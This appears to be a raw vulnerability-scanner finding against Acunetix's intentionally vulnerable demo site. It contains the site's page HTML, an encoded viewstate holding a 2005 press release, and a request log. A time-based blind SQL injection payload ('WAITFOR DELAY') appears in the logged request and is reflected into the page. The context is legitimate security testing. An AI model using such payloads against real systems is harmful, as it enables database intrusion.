AgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBShhZHMvZGVmLmh0bWwnIFdBSVRGT1IgREVMQVkgJzA6MDoxNScgLS0gZGSF0vWc+HpoqAibWOI4WERNoFgcsw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLR4fj8DwL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBEBPKEuK9BchsbVqQl16umz42YwV" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html' WAITFOR DELAY '0:0:15' -- " width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	POST
Parameter	id
Attack	0 WAITFOR DELAY '0:0:15' --
Evidence
Show / hide Request and Response
Request Header - size: 628 bytes.	POST http://testaspnet.vulnweb.com/Comments.aspx?id=0+WAITFOR+DELAY+%270%3A0%3A15%27+--+ HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1381 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
